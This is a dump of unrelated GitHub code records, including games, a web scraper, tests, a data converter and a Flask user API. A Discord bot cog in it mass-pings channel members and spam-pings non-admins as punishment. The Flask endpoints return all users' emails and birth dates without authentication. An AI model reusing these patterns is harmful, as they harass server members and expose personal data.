退出进程\ndriver.quit()\n\n\n\n","repo_name":"LiuJiYangYang/python-ride","sub_path":"自动化测试学习/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71696475935","text":"import os\nfrom discord.ext import commands\nfrom utils.argparser import Parser\n\n\nclass everyone(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.parser = Parser()\n self.env = os.getenv\n self.admins = self.env(\"ADMINS\")\n\n @commands.command()\n async def force_everyone(self, ctx):\n if str(ctx.message.author.id) in self.admins:\n mentions = \"PING PING \"\n\n x = ctx.channel.members\n for member in x:\n mention = \"<@\" + str(member.id) + \">\"\n mentions += mention + \" \"\n mentions += \" PING PING PING\"\n\n await ctx.message.channel.send(mentions)\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n else:\n await self.no_admin(ctx)\n\n async def no_admin(self, ctx):\n await ctx.message.channel.send(\"Dit mag jij helemaal niet gebruiken BOEF!\")\n for i in range(int(self.env(\"RETURN_SPAM_THRESHOLD\"))):\n await self.ping_person(ctx, ctx.message.author.id)\n\n @commands.command()\n async def everyone(self, ctx):\n await self.everyone_message(ctx)\n\n async def everyone_message(self, ctx, before=\"\", after=\"\"):\n x = ctx.channel.members\n no_ping = self.env(\"NO_PING\")\n mentions = \"PING PING \"\n for member in x:\n if str(member.id) not in no_ping:\n mention = \"<@\" + str(member.id) + \">\"\n mentions += mention + \" \"\n mentions += \" PING PING PING\"\n\n mentions = str(before) + mentions + str(after)\n await ctx.message.channel.send(mentions)\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n\n async def ping_person(self, ctx, person_id, before=\"\", after=\"\"):\n await ctx.message.channel.send(str(before) + \"<@\"+str(person_id)+\">\" + str(after))\n\n @commands.command()\n async def EVERYONE(self, ctx, amount=2):\n over_request = 0\n threshold = int(self.env(\"TAG_THRESHOLD\"))\n if amount > threshold:\n over_request = amount - threshold\n amount = threshold\n\n for i in range(1, amount+1):\n before = \"(\" + str(i) + \"/\" + str(amount) + \"): \"\n await self.everyone_message(ctx, before=before)\n\n for i in range(1, over_request+1):\n before = \"(\" + str(i) + \"/\" + str(over_request) + \"): \"\n await self.ping_person(ctx, ctx.message.author.id, before=before)\n\n @commands.command()\n async def SYMEN(self, ctx, amount=10):\n for i in range(amount):\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n\n @commands.command()\n async def noping(self, ctx):\n no_ping_list = self.env(\"NO_PING\")[1:-1].split(\",\")\n if str(ctx.message.author.id) not in no_ping_list:\n no_ping_list.append(str(ctx.message.author.id))\n write_list = \"[\"\n\n for id in no_ping_list:\n write_list += str(id) + \",\"\n write_list = write_list[:-1] + \"]\"\n\n os.environ[\"NO_PING\"] = str(write_list)\n\n @commands.command()\n async def ping(self, ctx):\n no_ping_list = self.env(\"NO_PING\").replace(\" \", \"\")[1:-1].split(\",\")\n\n if str(ctx.message.author.id) in no_ping_list:\n no_ping_list.remove(str(ctx.message.author.id))\n\n write_list = \"[\"\n\n for id in no_ping_list:\n write_list += str(id) + \",\"\n write_list = write_list[:-1] + \"]\"\n\n os.environ[\"NO_PING\"] = str(write_list)\n\n\ndef setup(bot):\n bot.add_cog(everyone(bot))\n\n","repo_name":"bverpaalen/discord_ping_bot","sub_path":"commands/everyone.py","file_name":"everyone.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72703642014","text":"import pygame\nimport random\nimport sys\nimport time\nimport multiprocessing\nfrom tkinter import *\nfrom tkinter import messagebox\n\nTk().wm_withdraw()\n\nSiGongJoA = pygame.image.load('heroes.png')\npygame.display.set_icon(SiGongJoA)\n\nwidth, height = 640, 480 #화면크기 설정\nhowManySigong = 7 #난이도 설정 (낮을수록 쉽고 높을수록 어렵습니다)\n\nclass Heroes:\n heroes = pygame.image.load('heroes.png')\n heroesSize = heroes.get_rect().size\n heroesX = 0\n heroesY = -height\n heroesSpeed = 7\n\ndef GetHeroesSpeed():\n return random.randrange(7,20)\n \ndef gameover():\n #pygame.mixer.music.stop()\n #배경음악 관련된 코드입니다. 저작권 문제로 깃허브에는 업로드 하지 않겠습니다.\n messagebox.showinfo(\"Game Over\", \"시공속으로 빨려들어갔습니다\\n\\n\\n점수 : %d\" % gamePoint)\n sys.exit()\n\ndef paintEntity(entity, x, y):\n monitor.blit(entity, (x, y))\n\ndef playGame():\n global monitor, person, gamePoint\n gamePoint = 0\n personX = width/2 - (personSize[0]/2)\n dx = 0\n hms = howManySigong\n\n SG = [0] * hms\n '''\n pygame.mixer.music.load('bgm.mp3')\n pygame.mixer.music.play(-1)\n #배경음악 관련된 코드입니다. 저작권 ���제로 깃허브에는 업로드 하지 않겠습니다.\n '''\n for i in range(0,hms):\n SG[i] = Heroes()\n SG[i].heroesX = random.randrange(0,width-70)\n SG[i].heroesSpeed = random.randrange(5,15)\n \n while True:\n (pygame.time.Clock()).tick(100)\n monitor.fill((50,50,60))\n\n for i in pygame.event.get():\n if i.type in [pygame.QUIT]:\n pygame.quit()\n sys.exit()\n\n if i.type in [pygame.KEYDOWN]:\n if i.key == pygame.K_LEFT:\n dx = -5\n elif i.key == pygame.K_RIGHT:\n dx = +5\n\n if i.type in [pygame.KEYUP]:\n if i.key == pygame.K_LEFT or i.key == pygame.K_RIGHT:\n dx = 0\n\n if (0 < personX + dx and personX + dx <= width - personSize[0]):\n personX += dx\n\n paintEntity(person, personX, height-81)\n\n for i in range(0, hms):\n SG[i].heroesY += SG[i].heroesSpeed\n if SG[i].heroesY > height:\n SG[i].heroesY = -SG[i].heroesSize[0]\n SG[i].heroesX = random.randrange(0,width-SG[i].heroesSize[0])\n SG[i].heroesSpeed = GetHeroesSpeed()\n gamePoint += 1\n\n paintEntity(SG[i].heroes, SG[i].heroesX, SG[i].heroesY)\n if (height - 120 < SG[i].heroesY < height-20):\n if (personX < SG[i].heroesX + 55) and (SG[i].heroesX < personX + 25):\n gameover()\n\n pygame.display.update()\n\nmonitor = None\nperson, personSize = None, 0\n\npygame.init()\nmonitor = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"시.공.시.러!\")\n\nperson = pygame.image.load('person.png')\npersonSize = person.get_rect().size\n\nplayGame()","repo_name":"kdo9921/I-Hate-Heroes","sub_path":"I Hate Heroes.py","file_name":"I Hate Heroes.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3418697487","text":"import pygame\nimport random\nfrom pygame.sprite import Sprite\n\n\nclass Ship_Explosion(Sprite):\n\t# Explosions when ship die\n\n\tdef __init__(self, screen, ship):\n\t\tsuper(Ship_Explosion,self).__init__()\n\t\tself.screen = screen\n\t\tself.image = pygame.image.load('images/explosion/Explosion1.png')\n\t\tself.image1 = pygame.image.load('images/explosion/Explosion1.png')\n\t\tself.image2 = pygame.image.load('images/explosion/Explosion2.png')\n\t\tself.image3 = pygame.image.load('images/explosion/Explosion3.png')\n\t\tself.image4 = pygame.image.load('images/explosion/Explosion4.png')\n\t\tself.image5 = pygame.image.load('images/explosion/Explosion5.png')\n\t\tself.image6 = pygame.image.load('images/explosion/Explosion6.png')\n\t\tself.image7 = pygame.image.load('images/explosion/Explosion7.png')\n\t\tself.rect = self.image1.get_rect()\n\t\tself.rect.centerx = ship.rect.centerx - ship.rect.width/2 + random.randint(0, ship.rect.width)\n\t\tself.rect.centery = ship.rect.centery - ship.rect.height/2 + random.randint(0, ship.rect.height)\n\t\t#self.rect.top = ship.rect.top +10\n\n\t\tself.tick = 0\n\t\t#self.y = float(self.rect.centery)\n\n\t\n\tdef update(self):\n\t\t# Change explosion states\n\t\tself.tick += 1\n\t\tif self.tick == 1:\n\t\t\tself.image = self.image1\n\t\telif self.tick == 2:\n\t\t\tself.image = self.image2\n\t\telif self.tick == 3:\n\t\t\tself.image = self.image3\n\t\telif self.tick == 4:\n\t\t\tself.image = self.image4\n\t\telif self.tick == 5:\n\t\t\tself.image = self.image5\n\t\telif self.tick == 6:\n\t\t\tself.image = self.image6\n\t\telif self.tick == 7:\n\t\t\tself.image = self.image7\t\n\n\tdef draw_ship_explosion(self):\n\t\tself.screen.blit(self.image, self.rect)","repo_name":"ThanhHuy-Le/PyInvaders","sub_path":"ShipExplosion.py","file_name":"ShipExplosion.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28227456516","text":"import requests\nimport time\nimport re, urllib\nimport os\nfrom bs4 import BeautifulSoup\ndef get_web_page(url):\n resp = requests.get(\n url=url,\n cookies={'over18': '1'}\n )\n if resp.status_code != 200:\n print('Invalid url:', resp.url)\n return None\n else:\n return resp.text\n\n#‹ 上頁\n\ndef get_articles(dom, date):\n soup = BeautifulSoup(dom, 'html.parser')\n\n articles = [] # 儲存取得的文章資料\n divs = soup.find_all('div', 'r-ent')\n for d in divs:\n date1=date\n date2=str(d.find('div', 'date').string)\n\n\n #if d.find('div', 'date').string == date: # 發文日期正確\n if date1 == date2.lstrip(): # 發文日期正確\n # 取得推文數\n push_count = 0\n if d.find('div', 'nrec').string:\n try:\n push_count = int(d.find('div', 'nrec').string) # 轉換字串為數字\n except ValueError: # 若轉換失敗,不做任何事,push_count 保持為 0\n pass\n\n # 取得文章連結及標題\n if d.find('a'): # 有超連結,表示文章存在,未被刪除\n href = d.find('a')['href']\n title = d.find('a').string\n articles.append({\n 'title': title,\n 'href': href,\n 'push_count': push_count\n })\n return articles\n\n\ndef parse(dom):\n soup = BeautifulSoup(dom, 'html.parser')\n links = soup.find(id='main-content').find_all('a')\n img_urls = []\n for link in links:\n if re.match(r'^https?://(i.)?(m.)?imgur.com', link['href']):\n img_urls.append(link['href'])\n return img_urls\n\ndef save(img_urls, title):\n if img_urls:\n try:\n dname = title.strip() # 用 strip() 去除字串前後的空白\n os.makedirs(dname)\n for img_url in img_urls:\n print(\"cs path:\"+img_url)\n if img_url.split('//')[1].startswith('m.'):\n img_url = img_url.replace('//m.', '//i.')\n if not img_url.split('//')[1].startswith('i.'):\n img_url = img_url.split('//')[0] + '//i.' + img_url.split('//')[1]\n if not img_url.endswith('.jpg'):\n img_url += '.jpg'\n fname = img_url.split('/')[-1]\n urllib.request.urlretrieve(img_url, os.path.join(dname, fname))\n except Exception as e:\n print(e)\n\n\nPTT_URL = 'https://www.ptt.cc'\n\npage = get_web_page('https://www.ptt.cc/bbs/Beauty/index.html')\nif page:\n date = time.strftime(\"%m/%d\").lstrip('0') # 今天日期, 去掉開頭的 '0' 以符合 PTT 網站格式\n print(\"today: \"+date)\n current_articles = get_articles(page, date)\n for article in current_articles:\n print(\"CS No:\"+str(article['push_count']))\n if article[\"push_count\"] >10:\n page = get_web_page(PTT_URL + article['href'])\n if page:\n img_urls = parse(page)\n save(img_urls, article['title'])\n article['num_image'] = len(img_urls)\n","repo_name":"bobyme/2018_04_08_PythonWebCrawler","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12537891645","text":"#ejercicio 1: Imprimir en pantalla los números pares del 1 al 500\n#ejercicio 2: Imprimir en pantalla los numeros primos del 1 al 100\n\n\"\"\"contador = 2\nwhile contador <=498:\n print(contador)\n contador +=2\nprint(contador)\"\"\"\n\n'''contador = 1'''\n\n\"\"\"for num in range(1,501):\n #print(num)\n if num % 2 == 0:\n print(num)\"\"\"\n\n\"\"\"for num in range(1,500):\n if num % 2 == 0:\n print(num)\"\"\"\n \ncontador = 1\nlimite = 100\nfor a in range(1, limite+1):\n c = 0\n for b in range(1, contador+1):\n a = contador % b\n if a == 0:\n c = c +1\n if c == 2:\n print(contador)\n else:\n a = a -1\n contador += 1\n \n","repo_name":"oscarjuela/workspace","sub_path":"curso_python/viernes_11/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17445877342","text":"import os\nfrom scipy.io import wavfile\n\nseconds = 0\n\nread_path = \"Data/human_records/full_records_wav/\"\n\nfor file in os.listdir(read_path):\n rate, data = wavfile.read(read_path + file)\n seconds += len(data)/rate\n\nprint(\"Homan records Data length is: {} minutes\".format(seconds/60))","repo_name":"AlonBarak-dev/Speech_Detection_With_UAV","sub_path":"count_minutes_records.py","file_name":"count_minutes_records.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14141642822","text":"from __future__ import division, print_function, absolute_import, \\\n unicode_literals\n\nimport math\n\nimport pytest\nimport hypothesis.strategies as ds\nfrom hypothesis import Settings, find, given\nfrom hypothesis.errors import InvalidArgument\nfrom tests.common.basic import Bitfields, BoringBitfields\n\n\ndef fn_test(*fnkwargs):\n fnkwargs = list(fnkwargs)\n return pytest.mark.parametrize(\n ('fn', 'args'), fnkwargs,\n ids=[\n '%s(%s)' % (fn.__name__, ', '.join(map(repr, args)))\n for fn, args in fnkwargs\n ]\n )\n\n\ndef fn_ktest(*fnkwargs):\n fnkwargs = list(fnkwargs)\n return pytest.mark.parametrize(\n ('fn', 'kwargs'), fnkwargs,\n ids=[\n '%s(%s)' % (fn.__name__, ', '.join(\n '%s=%r' % (k, v)\n for k, v in kwargs.items()\n ),)\n for fn, kwargs in fnkwargs\n ]\n )\n\n\n@fn_ktest(\n (ds.integers, {'min_value': float('nan')}),\n (ds.integers, {'min_value': 2, 'max_value': 1}),\n (ds.sampled_from, {'elements': ()}),\n (ds.lists, {}),\n (ds.lists, {'average_size': float('nan')}),\n (ds.lists, {'min_size': 10, 'max_size': 9}),\n (ds.lists, {'min_size': -10, 'max_size': -9}),\n (ds.lists, {'max_size': -9}),\n (ds.lists, {'max_size': 10}),\n (ds.lists, {'min_size': -10}),\n (ds.lists, {'max_size': 10, 'average_size': 20}),\n (ds.lists, {'min_size': 1.0, 'average_size': 0.5}),\n (ds.lists, {'elements': 'hi'}),\n (ds.text, {'min_size': 10, 'max_size': 9}),\n (ds.text, {'max_size': 10, 'average_size': 20}),\n (ds.binary, {'min_size': 10, 'max_size': 9}),\n (ds.binary, {'max_size': 10, 'average_size': 20}),\n (ds.floats, {'min_value': float('nan')}),\n (ds.floats, {'max_value': 0.0, 'min_value': 1.0}),\n (ds.fixed_dictionaries, {'mapping': 'fish'}),\n (ds.fixed_dictionaries, {'mapping': {1: 'fish'}}),\n (ds.dictionaries, {'keys': ds.integers(), 'values': 1}),\n (ds.dictionaries, {'keys': 1, 'values': ds.integers()}),\n (ds.text, {'alphabet': '', 'min_size': 1}),\n)\ndef test_validates_keyword_arguments(fn, kwargs):\n with pytest.raises(InvalidArgument):\n fn(**kwargs)\n\n\n@fn_ktest(\n (ds.integers, {'min_value': 0}),\n (ds.integers, {'min_value': 11}),\n (ds.integers, {'min_value': 11, 'max_value': 100}),\n (ds.integers, {'max_value': 0}),\n (ds.lists, {'max_size': 0}),\n (ds.lists, {'elements': ds.integers()}),\n (ds.lists, {'elements': ds.integers(), 'max_size': 5}),\n (ds.lists, {'elements': ds.booleans(), 'min_size': 5}),\n (ds.lists, {'elements': ds.booleans(), 'min_size': 5, 'max_size': 10}),\n (ds.lists, {\n 'average_size': 20, 'elements': ds.booleans(), 'max_size': 25}),\n (ds.sets, {\n 'min_size': 10, 'max_size': 10, 'elements': ds.integers(),\n }),\n (ds.booleans, {}),\n (ds.just, {'value': 'hi'}),\n (ds.integers, {'min_value': 12, 'max_value': 12}),\n (ds.floats, {}),\n (ds.floats, {'min_value': 1.0}),\n (ds.floats, {'max_value': 1.0}),\n (ds.floats, {'max_value': 1.0, 'min_value': -1.0}),\n (ds.sampled_from, {'elements': [1]}),\n (ds.sampled_from, {'elements': [1, 2, 3]}),\n (ds.fixed_dictionaries, {'mapping': {1: ds.integers()}}),\n (ds.dictionaries, {'keys': ds.booleans(), 'values': ds.integers()}),\n (ds.text, {'alphabet': 'abc'}),\n (ds.text, {'alphabet': ''}),\n (ds.text, {'alphabet': ds.sampled_from('abc')}),\n)\ndef test_produces_valid_examples_from_keyword(fn, kwargs):\n fn(**kwargs).example()\n\n\n@fn_test(\n (ds.one_of, (1,))\n)\ndef test_validates_args(fn, args):\n with pytest.raises(InvalidArgument):\n fn(*args)\n\n\n@fn_test(\n (ds.one_of, (ds.booleans(), ds.tuples(ds.booleans()))),\n (ds.one_of, (ds.booleans(),)),\n (ds.text, ()),\n (ds.binary, ()),\n (ds.builds, (lambda x, y: x + y, ds.integers(), ds.integers())),\n)\ndef test_produces_valid_examples_from_args(fn, args):\n fn(*args).example()\n\n\ndef test_tuples_raise_error_on_bad_kwargs():\n with pytest.raises(TypeError):\n ds.tuples(stuff='things')\n\n\ndef test_streaming_streams():\n for v in ds.streaming(ds.integers(max_value=1000)).example()[:10]:\n assert v <= 1000\n\n\n@given(ds.lists(ds.booleans(), min_size=10, max_size=10))\ndef test_has_specified_length(xs):\n assert len(xs) == 10\n\n\n@given(ds.integers(max_value=100), settings=Settings(max_examples=100))\ndef test_has_upper_bound(x):\n assert x <= 100\n\n\n@given(ds.integers(min_value=100))\ndef test_has_lower_bound(x):\n assert x >= 100\n\n\n@given(ds.integers(min_value=1, max_value=2))\ndef test_is_in_bounds(x):\n assert 1 <= x <= 2\n\n\ndef test_float_can_find_max_value_inf():\n assert find(\n ds.floats(max_value=float('inf')), lambda x: math.isinf(x)\n ) == float('inf')\n assert find(\n ds.floats(min_value=0.0), lambda x: math.isinf(x)) == float('inf')\n\n\ndef test_float_can_find_min_value_inf():\n find(ds.floats(), lambda x: x < 0 and math.isinf(x))\n find(\n ds.floats(min_value=float('-inf'), max_value=0.0),\n lambda x: math.isinf(x))\n\n\ndef test_can_use_basic_strategies():\n assert find(ds.basic(Bitfields), lambda x: True) == 0\n assert find(ds.basic(Bitfields()), lambda x: True) == 0\n assert find(ds.basic(BoringBitfields), lambda x: True) != 0\n\n\ndef test_can_use_basic_strategies_with_only_kwargs():\n assert find(\n ds.basic(generate=BoringBitfields().generate), lambda x: True) != 0\n\n\ndef test_can_override_simplify_in_basic_strategies():\n assert find(\n ds.basic(BoringBitfields, simplify=Bitfields().simplify),\n lambda x: True) == 0\n\n\ndef test_can_find_none_list():\n assert find(ds.lists(ds.none()), lambda x: len(x) >= 3) == [None] * 3\n\n\ndef test_fractions():\n assert find(ds.fractions(), lambda f: f >= 1) == 1\n\n\ndef test_decimals():\n assert find(ds.decimals(), lambda f: f.is_finite() and f >= 1) == 1\n\n\ndef test_non_float_decimal():\n find(ds.decimals(), lambda d: ds.float_to_decimal(float(d)) != d)\n\n\ndef test_validates_min_size_for_sets():\n ds.sets(ds.booleans(), min_size=2)\n with pytest.raises(InvalidArgument):\n ds.sets(ds.booleans(), min_size=3)\n\n\ndef test_produces_dictionaries_of_at_least_minimum_size():\n t = find(\n ds.dictionaries(ds.booleans(), ds.integers(), min_size=2),\n lambda x: True)\n assert t == {False: 0, True: 0}\n\n\n@given(\n ds.dictionaries(ds.integers(), ds.integers(), max_size=5),\n settings=Settings(max_examples=50))\ndef test_dictionaries_respect_size(d):\n assert len(d) <= 5\n\n\n@given(\n ds.dictionaries(ds.integers(), ds.integers(), max_size=0),\n settings=Settings(max_examples=50))\ndef test_dictionaries_respect_zero_size(d):\n assert len(d) <= 5\n\n\n@given(\n ds.lists(ds.none(), max_size=5)\n)\ndef test_none_lists_respect_max_size(ls):\n assert len(ls) <= 5\n\n\n@given(\n ds.lists(ds.none(), max_size=5, min_size=1)\n)\ndef test_none_lists_respect_max_and_min_size(ls):\n assert 1 <= len(ls) <= 5\n","repo_name":"graydon/hypothesis","sub_path":"tests/cover/test_direct_strategies.py","file_name":"test_direct_strategies.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"901944161","text":"import requests\nimport string\nfrom collections import Counter\n\nclass Scraper:\n\n def fetch_news(self, urls):\n article_contents = []\n for url in urls:\n try:\n contents = requests.get(url).text\n article_contents.append(contents)\n except Exception as e:\n print(e)\n return article_contents\n\ndef is_clean(word):\n blacklist = {\"var\", \"img\", \"e\", \"void\"}\n if not word:\n return False\n if word in blacklist:\n return False\n for i, letter in enumerate(word):\n if i > 0 and letter in string.ascii_uppercase:\n return False\n if letter not in string.ascii_letters:\n return False\n return True\n\nclass Cleaner:\n\n def clean_articles(self, articles):\n clean_articles = []\n\n for article in articles:\n clean_words = []\n try:\n for word in article.split(\" \"):\n if is_clean(word):\n clean_words.append(word)\n except Exception as e:\n print(e)\n clean_articles.append(' '.join(clean_words))\n return clean_articles\n\n\nclass Deduplicator:\n\n def deduplicate_articles(self, articles):\n seen_articles = set()\n deduplicated_articles = []\n for article in articles:\n if hash(article) in seen_articles:\n continue\n else:\n seen_articles.add(hash(article))\n deduplicated_articles.append(article)\n\n return deduplicated_articles\n\n\nclass Analyzer:\n good_words = {\"unveiled\", \"available\", \"faster\", \"stable\"}\n bad_words = {\"sued\", \"defiance\", \"violation\"}\n\n def extract_entities_and_sentiment(self, articles):\n entity_score_pairs = []\n for article in articles:\n score = 0\n entities = []\n for word in article.split(\" \"):\n if word[0] == word[0].upper():\n entities.append(word)\n if word.lower() in self.good_words:\n score += 1\n elif word.lower() in self.bad_words:\n score -= 1\n main_entities = [i[0] for i in Counter(entities).most_common(2)]\n entity_score_pair = (main_entities, score)\n entity_score_pairs.append(entity_score_pair)\n return entity_score_pairs\n\nclass DecisionMaker:\n target_companies = set(['Apple', 'Uber', 'Google'])\n\n def make_decisions(self, entity_score_pairs):\n decisions = []\n for entities, score in entity_score_pairs:\n for entity in entities:\n if entity in self.target_companies:\n quantity = abs(score)\n order = \"Buy\" if score > 0 else \"Sell\"\n decision = (order, quantity, entity)\n decisions.append(decision)\n return decisions\n\ndef test_scraper():\n scraper = Scraper()\n assert scraper.fetch_news([\"https://asdfsdfsfsdkklzhfgarefsdfsfasdfasdf2232323f.com\"]) == []\n assert len(scraper.fetch_news([\"https://google.com\", \"https://amazon.com\"])) == 2\n\ndef test_is_clean():\n print(is_clean(\"\"))\n assert not is_clean(\"\")\n assert not is_clean(\"{}34\")\n assert not is_clean(\"snakeCase\")\n assert is_clean(\"word\")\n\n\ndef test_cleaner():\n cleaner = Cleaner()\n article = \"this is anArticle test\"\n assert cleaner.clean_articles([article])[0] == \"this is test\"\n\n\ndef test_dedup():\n dedup = Deduplicator()\n articles = [\"one\", \"one\", \"two\"]\n assert dedup.deduplicate_articles(articles) == [\"one\", \"two\"]\n\ndef test_analzer():\n analyzer = Analyzer()\n articles = [\"Uber unveiled self driving car\"]\n\n assert analyzer.extract_entities_and_sentiment(articles) == [(['Uber'], 1)]\n\n\n","repo_name":"PacktWorkshops/The-Artificial-Intelligence-Infrastructure-Workshop","sub_path":"Chapter08/tests/ex01_test.py","file_name":"ex01_test.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"36549617024","text":"import argparse\nfrom os import path as osp\n\nfrom dataset_converters import nuscenes_converter as nuscenes_converter\nfrom dataset_converters import semantickitti_converter\nfrom dataset_converters.update_infos_to_v2 import update_pkl_infos\n\ndef nuscenes_data_prep(root_path,\n info_prefix,\n version,\n dataset_name,\n out_dir,\n max_sweeps=10):\n \"\"\"Prepare data related to nuScenes dataset.\n\n Related data consists of '.pkl' files recording basic infos,\n 2D annotations and groundtruth database.\n\n Args:\n root_path (str): Path of dataset root.\n info_prefix (str): The prefix of info filenames.\n version (str): Dataset version.\n dataset_name (str): The dataset class name.\n out_dir (str): Output directory of the groundtruth database info.\n max_sweeps (int, optional): Number of input consecutive frames.\n Default: 10\n \"\"\"\n nuscenes_converter.create_nuscenes_infos(\n root_path, info_prefix, version=version, max_sweeps=max_sweeps)\n\n if version == 'v1.0-test':\n info_test_path = osp.join(out_dir, f'{info_prefix}_infos_test.pkl')\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_test_path)\n return\n\n info_train_path = osp.join(out_dir, f'{info_prefix}_infos_train.pkl')\n info_val_path = osp.join(out_dir, f'{info_prefix}_infos_val.pkl')\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_train_path)\n update_pkl_infos('nuscenes', out_dir=out_dir, pkl_path=info_val_path)\n\ndef semantickitti_data_prep(info_prefix, out_dir):\n \"\"\"Prepare the info file for SemanticKITTI dataset.\n\n Args:\n info_prefix (str): The prefix of info filenames.\n out_dir (str): Output directory of the generated info file.\n \"\"\"\n semantickitti_converter.create_semantickitti_info_file(\n info_prefix, out_dir)\n\n\nparser = argparse.ArgumentParser(description='Data converter arg parser')\nparser.add_argument('dataset', metavar='kitti', help='name of the dataset')\nparser.add_argument(\n '--root-path',\n type=str,\n default='./data/kitti',\n help='specify the root path of dataset')\nparser.add_argument(\n '--version',\n type=str,\n default='v1.0',\n required=False,\n help='specify the dataset version, no need for kitti')\nparser.add_argument(\n '--max-sweeps',\n type=int,\n default=10,\n required=False,\n help='specify sweeps of lidar per example')\nparser.add_argument(\n '--with-plane',\n action='store_true',\n help='Whether to use plane information for kitti.')\nparser.add_argument(\n '--out-dir',\n type=str,\n default='./data/kitti',\n required=False,\n help='name of info pkl')\nparser.add_argument('--extra-tag', type=str, default='kitti')\nparser.add_argument(\n '--workers', type=int, default=4, help='number of threads to be used')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n from mmdet3d.utils import register_all_modules\n register_all_modules()\n\n if args.dataset == 'nuscenes' and args.version != 'v1.0-mini':\n train_version = f'{args.version}-trainval'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=train_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n test_version = f'{args.version}-test'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=test_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n elif args.dataset == 'nuscenes' and args.version == 'v1.0-mini':\n train_version = f'{args.version}'\n nuscenes_data_prep(\n root_path=args.root_path,\n info_prefix=args.extra_tag,\n version=train_version,\n dataset_name='NuScenesDataset',\n out_dir=args.out_dir,\n max_sweeps=args.max_sweeps)\n elif args.dataset == 'semantickitti':\n semantickitti_data_prep(\n info_prefix=args.extra_tag, out_dir=args.out_dir)\n else:\n raise NotImplementedError(f'Don\\'t support {args.dataset} dataset.')\n","repo_name":"SmartBot-PJLab/P3Former","sub_path":"tools/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"33"} +{"seq_id":"73110613853","text":"import json\nimport numpy as np\n\n\ndef task(ranking_str_1: str, ranking_str_2: str) -> str:\n try:\n ranking1 = json.loads(ranking_str_1)\n ranking2 = json.loads(ranking_str_2)\n except json.decoder.JSONDecodeError:\n print(\"Входные данные функции task5 должны быть json-строками\")\n exit(1)\n\n y_a = _get_relationship_matrix(ranking1)\n y_a_t = y_a.transpose()\n\n y_b = _get_relationship_matrix(ranking2)\n y_b_t = y_b.transpose()\n\n y_a_b = np.multiply(y_a, y_b)\n y_a_b_t = np.multiply(y_a_t, y_b_t)\n\n conflicts = []\n for i in range(y_a_b.shape[0]):\n for j in range(y_a_b.shape[1]):\n if y_a_b[i, j] == 0 and y_a_b_t[i, j] == 0:\n if (str(j + 1), str(i + 1)) not in conflicts:\n conflicts.append((str(i + 1), str(j + 1)))\n return json.dumps(conflicts)\n\n\ndef _get_relationship_matrix(ranking):\n ranks = dict()\n rank_len = _get_ranking_length(ranking)\n for i, rank in enumerate(ranking):\n if type(rank) is str:\n ranks[int(rank)] = i\n else:\n for r in rank:\n ranks[int(r)] = i\n\n return np.matrix([[1 if ranks[i + 1] <= ranks[j + 1] else 0 for j in range(rank_len)] for i in range(rank_len)],\n dtype=np.uint8)\n\n\ndef _get_ranking_length(ranking):\n length = 0\n for i in ranking:\n if type(i) is str:\n length += 1\n else:\n length += len(i)\n return length\n\n\ndef main():\n res = task('[\"1\", [\"2\",\"3\"],\"4\", [\"5\", \"6\", \"7\"], \"8\", \"9\", \"10\"]', '[[\"1\",\"2\"], [\"3\",\"4\",\"5\"], \"6\", \"7\", \"9\", [\"8\",\"10\"]]')\n print(f\"Ответ: {res}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DarkArtheme/system-analysis","sub_path":"task5/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22572681088","text":"from flask import Blueprint, make_response, jsonify,request\nfrom app.models.model import Users\n\nuser_blueprint = Blueprint('user', __name__)\n@user_blueprint.route('/user', methods=['GET'])\ndef user_profile():\n username = request.json['username']\n user = Users.objects.get(username=username)\n return make_response(jsonify({\n 'name': user.name,\n 'email': user.email,\n 'dob': user.dob\n }), 200)\n\n\n@user_blueprint.route('/getalluser', methods=['GET'])\ndef get_alluser():\n user = Users.objects.all()\n\n output = []\n for a in user:\n output.append({\n 'username':a.username,\n 'name':a.name,\n 'email':a.email,\n 'dob':a.dob\n })\n return jsonify({'user': 